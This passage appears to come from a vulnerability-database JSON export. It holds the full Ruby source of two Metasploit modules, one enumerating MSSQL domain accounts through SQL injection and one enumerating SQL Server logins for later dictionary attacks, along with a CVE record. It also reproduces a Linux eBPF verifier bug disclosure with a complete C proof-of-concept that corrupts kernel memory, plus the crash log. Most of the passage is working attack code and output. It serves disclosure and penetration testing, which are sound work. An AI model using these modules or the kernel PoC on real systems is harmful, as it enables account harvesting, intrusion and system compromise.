Enumerated accounts can then be used in online dictionary attacks.\n The syntax for injection URLs is: /testing.asp?id=1+and+1=[SQLi];--\n },\n 'Author' =>\n [\n 'nullbind <scott.sutherland[at]netspi.com>',\n 'antti <antti.rantasaari[at]netspi.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' => [[ 'URL','http://msdn.microsoft.com/en-us/library/ms174427.aspx']]\n ))\n\n register_options(\n [\n OptInt.new('START_RID', [true, 'RID to start fuzzing at.', 500]),\n OptInt.new('END_RID', [true, 'RID to stop fuzzing at.', 3000])\n ])\n end\n\n def run\n print_status(\"Grabbing the SQL Server name and domain...\")\n db_server_name = get_server_name\n if db_server_name.nil?\n print_error(\"Unable to grab the server name\")\n return\n else\n print_good(\"Server name: #{db_server_name}\")\n end\n\n db_domain_name = get_domain_name\n if db_domain_name.nil?\n print_error(\"Unable to grab domain name\")\n return\n end\n\n # Check if server is on a domain\n if db_server_name == db_domain_name\n print_error(\"The SQL Server does not appear to be part of a Windows domain\")\n return\n else\n print_good(\"Domain name: #{db_domain_name}\")\n end\n\n print_status(\"Grabbing the SID for the domain...\")\n windows_domain_sid = get_windows_domain_sid(db_domain_name)\n if windows_domain_sid.nil?\n print_error(\"Could not recover the SQL Server's domain sid.\")\n return\n else\n print_good(\"Domain sid: #{windows_domain_sid}\")\n end\n\n # Get a list of windows users, groups, and computer accounts using SUSER_NAME()\n total_rids = datastore['END_RID'] - datastore['START_RID']\n print_status(\"Brute forcing #{total_rids} RIDs via SQL injection, be patient...\")\n domain_users = get_win_domain_users(windows_domain_sid)\n if domain_users.nil?\n print_error(\"Sorry, no Windows domain accounts were found, or DC could not be contacted.\")\n return\n end\n\n # Print number of objects found and write to a file\n print_good(\"#{domain_users.length} user accounts, groups, and computer accounts 
were found.\")\n\n # Create table for report\n windows_domain_login_table = Rex::Text::Table.new(\n 'Header' => 'Windows Domain Accounts',\n 'Ident' => 1,\n 'Columns' => ['name']\n )\n\n # Add brute forced names to table\n domain_users.each do |object_name|\n windows_domain_login_table << [object_name]\n end\n\n print_line(windows_domain_login_table.to_s)\n\n # Create output file\n filename= \"#{datastore['RHOST']}-#{datastore['RPORT']}_windows_domain_accounts.csv\"\n path = store_loot(\n 'mssql.domain.accounts',\n 'text/plain',\n datastore['RHOST'],\n windows_domain_login_table.to_csv,\n filename,\n 'SQL Server query results'\n )\n print_status(\"Query results have been saved to: #{path}\")\n end\n\n # Get the server name\n def get_server_name\n clue_start = Rex::Text.rand_text_alpha(8 + rand(4))\n clue_end = Rex::Text.rand_text_alpha(8 + rand(4))\n sql = \"(select '#{clue_start}'+@@servername+'#{clue_end}')\"\n\n result = mssql_query(sql)\n\n if result && result.body && result.body =~ /#{clue_start}([^>]*)#{clue_end}/\n instance_name = $1\n sql_server_name = instance_name.split('\\\\')[0]\n else\n sql_server_name = nil\n end\n\n sql_server_name\n end\n\n # Get the domain name of the SQL Server\n def get_domain_name\n clue_start = Rex::Text.rand_text_alpha(8 + rand(4))\n clue_end = Rex::Text.rand_text_alpha(8 + rand(4))\n sql = \"(select '#{clue_start}'+DEFAULT_DOMAIN()+'#{clue_end}')\"\n\n result = mssql_query(sql)\n\n if result && result.body && result.body =~ /#{clue_start}([^>]*)#{clue_end}/\n domain_name = $1\n else\n domain_name = nil\n end\n\n domain_name\n end\n\n # Get the SID for the domain\n def get_windows_domain_sid(db_domain_name)\n domain_group = \"#{db_domain_name}\\\\Domain Admins\"\n\n clue_start = Rex::Text.rand_text_alpha(8)\n clue_end = Rex::Text.rand_text_alpha(8)\n\n sql = \"(select cast('#{clue_start}'+(select stuff(upper(sys.fn_varbintohexstr((SELECT SUSER_SID('#{domain_group}')))), 1, 2, ''))+'#{clue_end}' as int))\"\n\n result = 
mssql_query(sql)\n\n if result && result.body && result.body =~ /#{clue_start}([^>]*)#{clue_end}/\n object_sid = $1\n domain_sid = object_sid[0..47]\n return nil if domain_sid.empty?\n else\n domain_sid = nil\n end\n\n domain_sid\n end\n\n # Get list of windows accounts, groups and computer accounts\n def get_win_domain_users(domain_sid)\n clue_start = Rex::Text.rand_text_alpha(8)\n clue_end = Rex::Text.rand_text_alpha(8)\n\n windows_logins = []\n\n total_rids = datastore['END_RID'] - datastore['START_RID']\n # Fuzz the principal_id parameter (RID in this case) passed to the SUSER_NAME function\n (datastore['START_RID']..datastore['END_RID']).each do |principal_id|\n rid_diff = principal_id - datastore['START_RID']\n if principal_id % 100 == 0\n print_status(\"#{rid_diff} of #{total_rids } RID queries complete\")\n end\n\n user_sid = build_user_sid(domain_sid, principal_id)\n\n # Return if sid does not resolve correctly for a domain\n if user_sid.length < 48\n return nil\n end\n\n sql = \"(SELECT '#{clue_start}'+(SELECT SUSER_SNAME(#{user_sid}) as name)+'#{clue_end}')\"\n\n result = mssql_query(sql)\n\n if result && result.body && result.body =~ /#{clue_start}([^>]*)#{clue_end}/\n windows_login = $1\n\n unless windows_login.empty? || windows_logins.include?(windows_login)\n windows_logins.push(windows_login)\n print_good(\" #{windows_login}\")\n end\n end\n\n end\n\n windows_logins\n end\n\n def build_user_sid(domain_sid, rid)\n # Convert number to hex and fix order\n principal_id = \"%02X\" % rid\n principal_id = principal_id.size.even? ? 
principal_id : \"0#{principal_id}\"\n principal_id = principal_id.scan(/(..)/).reverse.join\n # Add padding\n principal_id = principal_id.ljust(8, '0')\n\n # Create full sid\n \"0x#{domain_sid}#{principal_id}\"\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli.rb"}, {"lastseen": "2019-11-29T22:09:50", "bulletinFamily": "exploit", "description": "This module can be used to obtain a list of all logins from a SQL Server with any login. Selecting all of the logins from the master..syslogins table is restricted to sysadmins. However, logins with the PUBLIC role (everyone) can quickly enumerate all SQL Server logins using the SUSER_SNAME function by fuzzing the principal_id parameter. This is pretty simple, because the principal IDs assigned to logins are incremental. Once logins have been enumerated they can be verified via sp_defaultdb error analysis. This is important, because not all of the principal IDs resolve to SQL logins (some resolve to roles instead). 
Once logins have been enumerated, they can be used in dictionary attacks.\n", "modified": "2017-07-24T13:26:21", "published": "2014-11-10T19:42:52", "id": "MSF:AUXILIARY/ADMIN/MSSQL/MSSQL_ENUM_SQL_LOGINS", "href": "", "type": "metasploit", "title": "Microsoft SQL Server SUSER_SNAME SQL Logins Enumeration", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/exploit/mssql_commands'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::MSSQL\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft SQL Server SUSER_SNAME SQL Logins Enumeration',\n 'Description' => %q{\n This module can be used to obtain a list of all logins from a SQL Server with any login.\n Selecting all of the logins from the master..syslogins table is restricted to sysadmins.\n However, logins with the PUBLIC role (everyone) can quickly enumerate all SQL Server\n logins using the SUSER_SNAME function by fuzzing the principal_id parameter. This is\n pretty simple, because the principal IDs assigned to logins are incremental. Once logins\n have been enumerated they can be verified via sp_defaultdb error analysis. This is\n important, because not all of the principal IDs resolve to SQL logins (some resolve to\n roles instead). 
Once logins have been enumerated, they can be used in dictionary attacks.\n },\n 'Author' => ['nullbind <scott.sutherland[at]netspi.com>'],\n 'License' => MSF_LICENSE,\n 'References' => [['URL','http://msdn.microsoft.com/en-us/library/ms174427.aspx']]\n ))\n\n register_options(\n [\n OptInt.new('FuzzNum', [true, 'Number of principal_ids to fuzz.', 300]),\n ])\n end\n\n def run\n # Check connection and issue initial query\n print_status(\"Attempting to connect to the database server at #{rhost}:#{rport} as #{datastore['USERNAME']}...\")\n if mssql_login_datastore\n print_good('Connected.')\n else\n print_error('Login was unsuccessful. Check your credentials.')\n disconnect\n return\n end\n\n # Query for sysadmin status\n print_status(\"Checking if #{datastore['USERNAME']} has the sysadmin role...\")\n user_status = check_sysadmin\n\n # Check if user has sysadmin role\n if user_status == 1\n print_good(\"#{datastore['USERNAME']} is a sysadmin.\")\n else\n print_status(\"#{datastore['USERNAME']} is NOT a sysadmin.\")\n end\n\n # Get a list if sql server logins using SUSER_NAME()\n print_status(\"Setup to fuzz #{datastore['FuzzNum']} SQL Server logins.\")\n print_status('Enumerating logins...')\n sql_logins_list = get_sql_logins\n if sql_logins_list.nil? 
|| sql_logins_list.empty?\n print_error('Sorry, somethings went wrong - SQL Server logins were found.')\n disconnect\n return\n else\n # Print number of initial logins found\n print_good(\"#{sql_logins_list.length} initial SQL Server logins were found.\")\n\n sql_logins_list.sort.each do |sql_login|\n if datastore['VERBOSE']\n print_status(\" - #{sql_login}\")\n end\n end\n end\n\n # Verify the enumerated SQL Logins using sp_defaultdb error ananlysis\n print_status('Verifying the SQL Server logins...')\n sql_logins_list_verified = verify_logins(sql_logins_list)\n if sql_logins_list_verified.nil?\n print_error('Sorry, no SQL Server logins could be verified.')\n disconnect\n return\n else\n\n # Display list verified SQL Server logins\n print_good(\"#{sql_logins_list_verified.length} SQL Server logins were verified:\")\n sql_logins_list_verified.sort.each do |sql_login|\n print_status(\" - #{sql_login}\")\n end\n end\n\n disconnect\n end\n\n # Checks if user is a sysadmin\n def check_sysadmin\n # Setup query to check for sysadmin\n sql = \"select is_srvrolemember('sysadmin') as IsSysAdmin\"\n\n # Run query\n result = mssql_query(sql)\n\n # Parse query results\n parse_results = result[:rows]\n status = parse_results[0][0]\n\n # Return status\n return status\n end\n\n # Gets trusted databases owned by sysadmins\n def get_sql_logins\n # Create array to store the sql logins\n sql_logins = []\n\n # Fuzz the principal_id parameter passed to the SUSER_NAME function\n (1..datastore['FuzzNum']).each do |principal_id|\n # Setup query\n sql = \"SELECT SUSER_NAME(#{principal_id}) as login\"\n\n # Execute query\n result = mssql_query(sql)\n\n # Parse results\n parse_results = result[:rows]\n sql_login = parse_results[0][0]\n\n # Add to sql server login list\n sql_logins.push(sql_login) unless sql_logins.include?(sql_login)\n end\n\n # Return list of logins\n sql_logins\n end\n\n # Checks if user has the db_owner role\n def verify_logins(sql_logins_list)\n\n # Create array for 
later use\n verified_sql_logins = []\n\n fake_db_name = Rex::Text.rand_text_alpha_upper(24)\n\n # Check if the user has the db_owner role is any databases\n sql_logins_list.each do |sql_login|\n # Setup query\n sql = \"EXEC sp_defaultdb '#{sql_login}', '#{fake_db_name}'\"\n\n # Execute query\n result = mssql_query(sql)\n\n # Parse results\n parse_results = result[:errors]\n result = parse_results[0]\n\n # Check if sid resolved to a sql login\n if result.include?(fake_db_name)\n verified_sql_logins.push(sql_login) unless verified_sql_logins.include?(sql_login)\n end\n\n # Check if sid resolved to a sql login\n if result.include?('alter the login')\n # Add sql server login to verified list\n verified_sql_logins.push(sql_login) unless verified_sql_logins.include?(sql_login)\n end\n end\n\n verified_sql_logins\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/mssql/mssql_enum_sql_logins.rb"}], "cve": [{"lastseen": "2019-05-29T18:16:55", "bulletinFamily": "NVD", "description": "kernel/bpf/verifier.c in the Linux kernel through 4.14.8 allows local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging register truncation mishandling.", "modified": "2018-01-09T17:48:00", "id": "CVE-2017-16996", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-16996", "published": "2017-12-27T17:08:00", "title": "CVE-2017-16996", "type": "cve", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-01-01T13:00:47", "bulletinFamily": "exploit", "description": "Exploit for linux platform in category dos / poc", "modified": "2017-12-22T00:00:00", "published": "2017-12-22T00:00:00", "href": "https://0day.today/exploit/description/29285", "id": "1337DAY-ID-29285", "type": "zdt", "title": "Linux Kernel >= 4.9 eBPF memory corruption bugs Vulnerability", "sourceData": "Hi!\r\n\r\nA 
few BPF verifier bugs in the Linux kernel, most of which can be used\r\nfor controlled memory corruption, have been fixed over the last days.\r\nOne of the bugs was introduced in 4.9, the others were only introduced\r\nin 4.14.\r\n\r\nThe fixes are in the net tree of the Linux kernel\r\n(https://git.kernel.org/pub/scm/linux/kernel/git/davem/net.git/log/kernel/bpf),\r\nbut not in Linus' tree yet.\r\n\r\nThe following bug was introduced in 4.9:\r\n\r\n=== fixed by \"bpf: fix incorrect sign extension in check_alu_op()\" ===\r\ncheck_alu_op() did not distinguish between\r\nBPF_ALU64|BPF_MOV|BPF_K (load 32-bit immediate, sign-extended to 64-bit)\r\nand BPF_ALU|BPF_MOV|BPF_K (load 32-bit immediate, zero-padded to 64-bit);\r\nit performed sign extension in both cases.\r\nDebian assigned CVE-2017-16995 for this issue.\r\n\r\n\r\nThe following bugs were introduced in 4.14:\r\n\r\n=== fixed by \"bpf/verifier: fix bounds calculation on BPF_RSH\" ===\r\nIncorrect signed bounds were being computed for BPF_RSH.\r\nIf the old upper signed bound was positive and the old lower signed bound was\r\nnegative, this could cause the new upper signed bound to be too low,\r\nleading to security issues.\r\n\r\n=== fixed by \"bpf: fix incorrect tracking of register size truncation\" ===\r\nThe BPF verifier did not properly handle register truncation to a smaller size.\r\n\r\nThe old code first mirrors the clearing of the high 32 bits in the bitwise\r\ntristate representation, which is correct. But then, it computes the new\r\narithmetic bounds as the intersection between the old arithmetic bounds and\r\nthe bounds resulting from the bitwise tristate representation. 
Therefore,\r\nwhen coerce_reg_to_32() is called on a number with bounds\r\n[0xffff'fff8, 0x1'0000'0007], the verifier computes\r\n[0xffff'fff8, 0xffff'ffff] as bounds of the truncated number.\r\nThis is incorrect: The truncated number could also be in the range [0, 7],\r\nand no meaningful arithmetic bounds can be computed in that case apart from\r\nthe obvious [0, 0xffff'ffff].\r\nDebian assigned CVE-2017-16996 for this issue.\r\n\r\n=== fixed by \"bpf: fix 32-bit ALU op verification\" ===\r\nadjust_scalar_min_max_vals() only truncates its inputs and otherwise operates on\r\n64-bit numbers while the BPF interpreter and JIT perform 32-bit arithmetic.\r\nThis means that the output of e.g. `(u32)0x40000000*(u32)5` will be incorrect.\r\nTo test this, you can use the following BPF code:\r\n\r\n BPF_MOV32_IMM(BPF_REG_1, 0x40000000),\r\n BPF_ALU32_IMM(BPF_MUL, BPF_REG_1, 5),\r\n BPF_EXIT_INSN()\r\n\r\nThe verifier generates the following output, which is incorrect:\r\n\r\n 0: R1=ctx(id=0,off=0,imm=0) R10=fp0\r\n 0: (b4) (u32) r1 = (u32) 1073741824\r\n 1: R1=inv1073741824 R10=fp0\r\n 1: (24) (u32) r1 *= (u32) 5\r\n 2: R1=inv5368709120 R10=fp0\r\n 2: (95) exit\r\n R0 !read_ok\r\n\r\n=== fixed by \"bpf: fix missing error return in check_stack_boundary()\" ===\r\ncheck_stack_boundary() prints an error into the verifier log, but doesn't\r\nexit, when a stack pointer doesn't have a known offset. 
This should be\r\nusable to get read+write access to spilled stack pointers.\r\n\r\n=== fixed by \"bpf: force strict alignment checks for stack pointers\" ===\r\nThe verifier did not force strict alignment checks for stack pointers, but\r\nthe tracking of stack spills relies on it; unaligned stack accesses can\r\nlead to corruption of spilled registers, which is exploitable.\r\n\r\n=== fixed by \"bpf: don't prune branches when a scalar is replaced with\r\na pointer\" ===\r\nThe BPF verifier pruned branches when a scalar is replaced with\r\na pointer, explicitly permitting confusing a pointer into a number\r\n(but not the other way around). This is a kernel pointer leak.\r\n\r\n=== fixed by \"bpf: fix integer overflows\" ===\r\nThere were various issues related to the limited size of integers used in\r\nthe verifier:\r\n - `off + size` overflow in __check_map_access()\r\n - `off + reg->off` overflow in check_mem_access()\r\n - `off + reg->var_off.value` overflow or 32-bit truncation of\r\n `reg->var_off.value` in check_mem_access()\r\n - 32-bit truncation in check_stack_boundary()\r\n\r\n\r\n\r\nCrash PoCs for some of these issues are at\r\nhttps://bugs.chromium.org/p/project-zero/issues/detail?id=1454,\r\nbut since oss-security prefers having PoCs in the mail directly, I've\r\npasted the PoCs below.\r\nFor the other issues, examples of how to trigger them are in the\r\nadded BPF selftests.\r\nThe rest of the mail is just PoC code, so if you're not interested\r\nin the PoCs, you can stop reading now.\r\n\r\n\r\n\r\n\r\n=== PoC for \"bpf: fix incorrect sign extension in check_alu_op()\" ===\r\nHere is a crasher that tries to write to a noncanonical address.\r\nNote that it is only designed to work on 4.14.\r\n\r\n======================================\r\n[email\u00a0protected]:~/bpf_range$ cat crasher_badimm.c\r\n#define _GNU_SOURCE\r\n#include <err.h>\r\n#include <stdint.h>\r\n#include <linux/bpf.h>\r\n#include <linux/filter.h>\r\n#include <stdio.h>\r\n#include 
<unistd.h>\r\n#include <sys/syscall.h>\r\n#include <asm/unistd_64.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n\r\n/* start from kernel */\r\n#define BPF_EMIT_CALL(FUNC) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_JMP | BPF_CALL, \\\r\n .dst_reg = 0, \\\r\n .src_reg = 0, \\\r\n .off = 0, \\\r\n .imm = (FUNC) }) /* ??? */\r\n#define BPF_MOV32_IMM(DST, IMM) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU | BPF_MOV | BPF_K, \\\r\n .dst_reg = DST, \\\r\n .src_reg = 0, \\\r\n .off = 0, \\\r\n .imm = IMM })\r\n#define BPF_REG_ARG1 BPF_REG_1\r\n#define BPF_REG_ARG2 BPF_REG_2\r\n#define BPF_REG_ARG3 BPF_REG_3\r\n#define BPF_REG_ARG4 BPF_REG_4\r\n#define BPF_REG_ARG5 BPF_REG_5\r\n#define BPF_PSEUDO_MAP_FD 1\r\n#define BPF_LD_IMM64_RAW(DST, SRC, IMM) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_LD | BPF_DW | BPF_IMM, \\\r\n .dst_reg = DST, \\\r\n .src_reg = SRC, \\\r\n .off = 0, \\\r\n .imm = (__u32) (IMM) }), \\\r\n ((struct bpf_insn) { \\\r\n .code = 0, /* zero is reserved opcode */ \\\r\n .dst_reg = 0, \\\r\n .src_reg = 0, \\\r\n .off = 0, \\\r\n .imm = ((__u64) (IMM)) >> 32 })\r\n#define BPF_ALU32_IMM(OP, DST, IMM) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU | BPF_OP(OP) | BPF_K, \\\r\n .dst_reg = DST, \\\r\n .src_reg = 0, \\\r\n .off = 0, \\\r\n .imm = IMM })\r\n#define BPF_LD_MAP_FD(DST, MAP_FD) \\\r\n BPF_LD_IMM64_RAW(DST, BPF_PSEUDO_MAP_FD, MAP_FD)\r\n#define BPF_ALU32_REG(OP, DST, SRC) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU | BPF_OP(OP) | BPF_X, \\\r\n .dst_reg = DST, \\\r\n .src_reg = SRC, \\\r\n .off = 0, \\\r\n .imm = 0 })\r\n#define BPF_EXIT_INSN() \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_JMP | BPF_EXIT, \\\r\n .dst_reg = 0, \\\r\n .src_reg = 0, \\\r\n .off = 0, \\\r\n .imm = 0 })\r\n/* Memory store, *(uint *) (dst_reg + off16) = src_reg */\r\n#define BPF_STX_MEM(SIZE, DST, SRC, OFF) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_STX | BPF_SIZE(SIZE) | BPF_MEM, \\\r\n .dst_reg = DST, \\\r\n .src_reg = SRC, \\\r\n 
.off = OFF, \\\r\n .imm = 0 })\r\n#define BPF_REG_FP BPF_REG_10\r\n#define BPF_MOV64_REG(DST, SRC) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU64 | BPF_MOV | BPF_X, \\\r\n .dst_reg = DST, \\\r\n .src_reg = SRC, \\\r\n .off = 0, \\\r\n .imm = 0 })\r\n#define BPF_ALU64_IMM(OP, DST, IMM) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU64 | BPF_OP(OP) | BPF_K, \\\r\n .dst_reg = DST, \\\r\n .src_reg = 0, \\\r\n .off = 0, \\\r\n .imm = IMM })\r\n#define BPF_MOV64_REG(DST, SRC) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU64 | BPF_MOV | BPF_X, \\\r\n .dst_reg = DST, \\\r\n .src_reg = SRC, \\\r\n .off = 0, \\\r\n .imm = 0 })\r\n#define BPF_REG_TMP BPF_REG_8\r\n#define BPF_LDX_MEM(SIZE, DST, SRC, OFF) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_LDX | BPF_SIZE(SIZE) | BPF_MEM, \\\r\n .dst_reg = DST, \\\r\n .src_reg = SRC, \\\r\n .off = OFF, \\\r\n .imm = 0 })\r\n#define BPF_JMP_IMM(OP, DST, IMM, OFF) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_JMP | BPF_OP(OP) | BPF_K, \\\r\n .dst_reg = DST, \\\r\n .src_reg = 0, \\\r\n .off = OFF, \\\r\n .imm = IMM })\r\n#define BPF_MOV64_IMM(DST, IMM) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU64 | BPF_MOV | BPF_K, \\\r\n .dst_reg = DST, \\\r\n .src_reg = 0, \\\r\n .off = 0, \\\r\n .imm = IMM })\r\n#define BPF_ALU64_REG(OP, DST, SRC) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU64 | BPF_OP(OP) | BPF_X, \\\r\n .dst_reg = DST, \\\r\n .src_reg = SRC, \\\r\n .off = 0, \\\r\n .imm = 0 })\r\n#define BPF_MOV32_REG(DST, SRC) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU | BPF_MOV | BPF_X, \\\r\n .dst_reg = DST, \\\r\n .src_reg = SRC, \\\r\n .off = 0, \\\r\n .imm = 0 })\r\n/* end from kernel */\r\n\r\n\r\nint bpf_(int cmd, union bpf_attr *attrs) {\r\n return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs));\r\n}\r\n\r\nvoid array_set(int mapfd, uint32_t key, uint32_t value) {\r\n union bpf_attr attr = {\r\n .map_fd = mapfd,\r\n .key = (uint64_t)&key,\r\n .value = (uint64_t)&value,\r\n .flags = BPF_ANY,\r\n 
};\r\n\r\n\r\n int res = bpf_(BPF_MAP_UPDATE_ELEM, &attr);\r\n if (res)\r\n err(1, \"map update elem\");\r\n}\r\n\r\n\r\nint main(void) {\r\n union bpf_attr create_map_attrs = {\r\n .map_type = BPF_MAP_TYPE_ARRAY,\r\n .key_size = 4,\r\n .value_size = 8,\r\n .max_entries = 16\r\n };\r\n int mapfd = bpf_(BPF_MAP_CREATE, &create_map_attrs);\r\n if (mapfd == -1)\r\n err(1, \"map create\");\r\n\r\n\r\n array_set(mapfd, 1, 1);\r\n\r\n char verifier_log[100000];\r\n struct bpf_insn insns[] = {\r\n BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),\r\n\r\n // fill r0 with pointer to map value\r\n BPF_MOV64_REG(BPF_REG_TMP, BPF_REG_FP),\r\n BPF_ALU64_IMM(BPF_ADD, BPF_REG_TMP, -4), // allocate 4 bytes stack\r\n BPF_MOV32_IMM(BPF_REG_ARG2, 1),\r\n BPF_STX_MEM(BPF_W, BPF_REG_TMP, BPF_REG_ARG2, 0),\r\n BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_TMP),\r\n BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),\r\n BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 2),\r\n BPF_MOV64_REG(BPF_REG_0, 0), // prepare exit\r\n BPF_EXIT_INSN(), // exit\r\n\r\n // r1 = 0xffff'ffff, mistreated as 0xffff'ffff'ffff'ffff\r\n BPF_MOV32_IMM(BPF_REG_1, 0xffffffff),\r\n // r1 = 0x1'0000'0000, mistreated as 0\r\n BPF_ALU64_IMM(BPF_ADD, BPF_REG_1, 1),\r\n // r1 = 0x1000'0000'0000'0000, mistreated as 0\r\n BPF_ALU64_IMM(BPF_LSH, BPF_REG_1, 28),\r\n\r\n // compute noncanonical pointer\r\n BPF_ALU64_REG(BPF_ADD, BPF_REG_0, BPF_REG_1),\r\n\r\n // crash by writing to noncanonical pointer\r\n BPF_MOV32_IMM(BPF_REG_1, 0xdeadbeef),\r\n BPF_STX_MEM(BPF_W, BPF_REG_0, BPF_REG_1, 0),\r\n\r\n // terminate to make the verifier happy\r\n BPF_MOV32_IMM(BPF_REG_0, 0),\r\n BPF_EXIT_INSN()\r\n };\r\n union bpf_attr create_prog_attrs = {\r\n .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,\r\n .insn_cnt = sizeof(insns) / sizeof(insns[0]),\r\n .insns = (uint64_t)insns,\r\n .license = (uint64_t)\"\",\r\n .log_level = 2,\r\n .log_size = sizeof(verifier_log),\r\n .log_buf = (uint64_t)verifier_log\r\n };\r\n int progfd = bpf_(BPF_PROG_LOAD, &create_prog_attrs);\r\n if (progfd == 
-1) {\r\n perror(\"prog load\");\r\n puts(verifier_log);\r\n return 1;\r\n }\r\n puts(\"ok so far?\");\r\n\r\n int socks[2];\r\n if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks))\r\n err(1, \"socketpair\");\r\n if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int)))\r\n err(1, \"setsockopt\");\r\n if (write(socks[1], \"a\", 1) != 1)\r\n err(1, \"write\");\r\n char c;\r\n if (read(socks[0], &c, 1) != 1)\r\n err(1, \"read res\");\r\n return 0;\r\n}\r\n[email\u00a0protected]:~/bpf_range$ gcc -o crasher_badimm crasher_badimm.c -Wall\r\n&& ./crasher_badimm\r\nok so far?\r\nSegmentation fault\r\n======================================\r\n\r\n\r\nHere is the resulting crash (note the corrupted heap address in R15):\r\n\r\n======================================\r\n[10599.403881] general protection fault: 0000 [#6] SMP KASAN\r\n[10599.403886] Modules linked in: binfmt_misc snd_hda_codec_generic\r\ncrct10dif_pclmul crc32_pclmul ghash_clmulni_intel snd_hda_intel\r\nsnd_hda_codec pcbc snd_hda_core qxl snd_hwdep snd_pcm snd_timer ttm\r\naesni_intel snd ppdev aes_x86_64 drm_kms_helper parport_pc crypto_simd\r\nsoundcore glue_helper drm parport evdev cryptd sg serio_raw pcspkr\r\nvirtio_console virtio_balloon button ip_tables x_tables autofs4 ext4\r\ncrc16 mbcache jbd2 fscrypto sr_mod cdrom sd_mod ata_generic 8139too\r\nehci_pci ata_piix uhci_hcd libata ehci_hcd 8139cp crc32c_intel mii\r\nvirtio_pci psmouse usbcore virtio_ring scsi_mod virtio i2c_piix4\r\nfloppy\r\n[10599.403952] CPU: 7 PID: 1610 Comm: crasher_badimm Tainted: G B D\r\n 4.15.0-rc1+ #4\r\n[10599.403954] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996),\r\nBIOS 1.10.2-1 04/01/2014\r\n[10599.403957] task: 000000004ae6ce3e task.stack: 000000006149ccc2\r\n[10599.403963] RIP: 0010:___bpf_prog_run+0x1a77/0x2490\r\n[10599.403966] RSP: 0018:ffff8801ef6bf838 EFLAGS: 00010292\r\n[10599.403969] RAX: 0000000000000000 RBX: ffffc900016150b8 RCX: ffffffff866483d7\r\n[10599.403971] RDX: 0000000000000001 RSI: 
0000000000000004 RDI: 0fff8801ac393b78\r\n[10599.403974] RBP: ffff8801ef6bf968 R08: 0000000000000000 R09: 0000000000000000\r\n[10599.403976] R10: 0000000000000001 R11: ffffed00358726b9 R12: ffffffff870be980\r\n[10599.403978] R13: 1ffff1003ded7f0e R14: 00000000deadbeef R15: 0fff8801ac393b78\r\n[10599.403981] FS: 00007fd705b43700(0000) GS:ffff8801f77c0000(0000)\r\nknlGS:0000000000000000\r\n[10599.403984] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\r\n[10599.403986] CR2: 0000561c31a24008 CR3: 00000001b153b002 CR4: 00000000001606e0\r\n[10599.403991] Call Trace:\r\n[10599.403997] ? sk_filter_trim_cap+0x5c/0x4e0\r\n[10599.404000] ? bpf_jit_compile+0x30/0x30\r\n[10599.404006] ? alloc_skb_with_frags+0x90/0x2c0\r\n[10599.404010] ? __bpf_prog_run32+0x83/0xc0\r\n[10599.404013] ? __bpf_prog_run64+0xc0/0xc0\r\n[10599.404017] ? sk_filter_trim_cap+0x5c/0x4e0\r\n[10599.404022] ? sk_filter_trim_cap+0xf7/0x4e0\r\n[10599.404028] ? unix_dgram_sendmsg+0x3e2/0x960\r\n[10599.404033] ? entry_SYSCALL_64_fastpath+0x1e/0x86\r\n[10599.404036] ? entry_SYSCALL_64_fastpath+0x1e/0x86\r\n[10599.404040] ? sock_alloc_inode+0x46/0x110\r\n[10599.404043] ? unix_stream_connect+0x840/0x840\r\n[10599.404046] ? __sock_create+0x7f/0x2c0\r\n[10599.404049] ? entry_SYSCALL_64_fastpath+0x1e/0x86\r\n[10599.404054] ? __lock_acquire.isra.31+0x2d/0xb40\r\n[10599.404059] ? __wake_up_common_lock+0xaf/0x130\r\n[10599.404065] ? unix_stream_connect+0x840/0x840\r\n[10599.404068] ? sock_sendmsg+0x6b/0x80\r\n[10599.404071] ? sock_write_iter+0x11d/0x1d0\r\n[10599.404075] ? sock_sendmsg+0x80/0x80\r\n[10599.404080] ? do_raw_spin_unlock+0x86/0x120\r\n[10599.404084] ? iov_iter_init+0x77/0xb0\r\n[10599.404089] ? __vfs_write+0x23e/0x340\r\n[10599.404092] ? kernel_read+0xa0/0xa0\r\n[10599.404098] ? __fd_install+0x5/0x160\r\n[10599.404102] ? __fget_light+0x9b/0xb0\r\n[10599.404107] ? vfs_write+0xe9/0x240\r\n[10599.404110] ? SyS_write+0xa7/0x130\r\n[10599.404121] ? 